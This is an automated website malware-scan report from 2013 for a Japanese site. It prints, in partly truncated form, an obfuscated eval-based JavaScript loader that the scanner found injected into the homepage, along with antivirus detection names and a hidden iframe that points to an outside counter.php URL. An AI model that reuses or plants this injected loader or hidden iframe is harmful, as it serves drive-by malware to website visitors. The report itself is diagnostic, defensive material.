Online Malware Scanner report for www.esn.co.jp

New scan:

www.esn.co.jp

(cached results from Mon Jul 15 07:30:10 2013 rescan)

Website Malware
Cleaning & Monitoring

Malware cleaning service from eVuln team.

  • Website cleaning
  • Redirects removal
  • Log files inspection
  • Reason eliminating
  • Blacklists removal
  • One year monitoring
  • Repeated fixing

website(s)

$119.00

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "www.esn.co.jp" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here are our suggestions how to fix this.
Malicious redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
OK

Setup daily monitoring of www.esn.co.jp

Paste the following HTML code anywhere into "www.esn.co.jp" website.

eVuln.com

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=www.esn.co.jp

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.esn.co.jp/
200 OK
Content-Length: 6409
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_71_6f_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_71_6f_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_77_76_6d_7a_7b_70_77_78_36_6b_77_75_37_6d_7b_6c_36_78_70_78_2f_43_15_12_28_71_6f_36_7b_7c_81_74_6d_36_78_
... 3138 bytes are skipped ...
12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.29
Avast
JS:Decode-AQB [Trj]
Emsisoft
Trojan.JS.Agent.JBT (B)
CAT-QuickHeal
JS/Iframe.DEG
DrWeb
JS.IFrame.457
Kaspersky
Trojan-Downloader.JS.Iframe.deg
Fortinet
JS/Iframe.DDG!tr.dldr
NANO-Antivirus
Trojan.Script.Expack.bvtkmp
Norman
Blacole.UC
GData
Trojan.JS.Agent.JBT
BitDefender
Trojan.JS.Agent.JBT

Hidden iFrame found.
size: 10x10     style: hidden
src: http://www.metodobaran.com/counter.php

<iframe src="http://www.metodobaran.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

http://www.esn.co.jp/test404page.js
404 Not Found
Content-Length: 208
Content-Type: text/html
clean

Malicious redirects

First query (normal visit):
GET / HTTP/1.1
Host: www.esn.co.jp

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Jul 2013 04:30:12 GMT
Accept-Ranges: bytes
ETag: "ee71f0-1909-51c5b937"
Server: Rapidsite/Apa
Content-Length: 6409
Content-Type: text/html
Last-Modified: Sat, 22 Jun 2013 14:48:23 GMT

...6409 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: www.esn.co.jp
Referer: http://www.google.com/search?q=www.esn.co.jp

Result:
The result is similar to the first query. There are no suspicious redirects found.
Infected sites found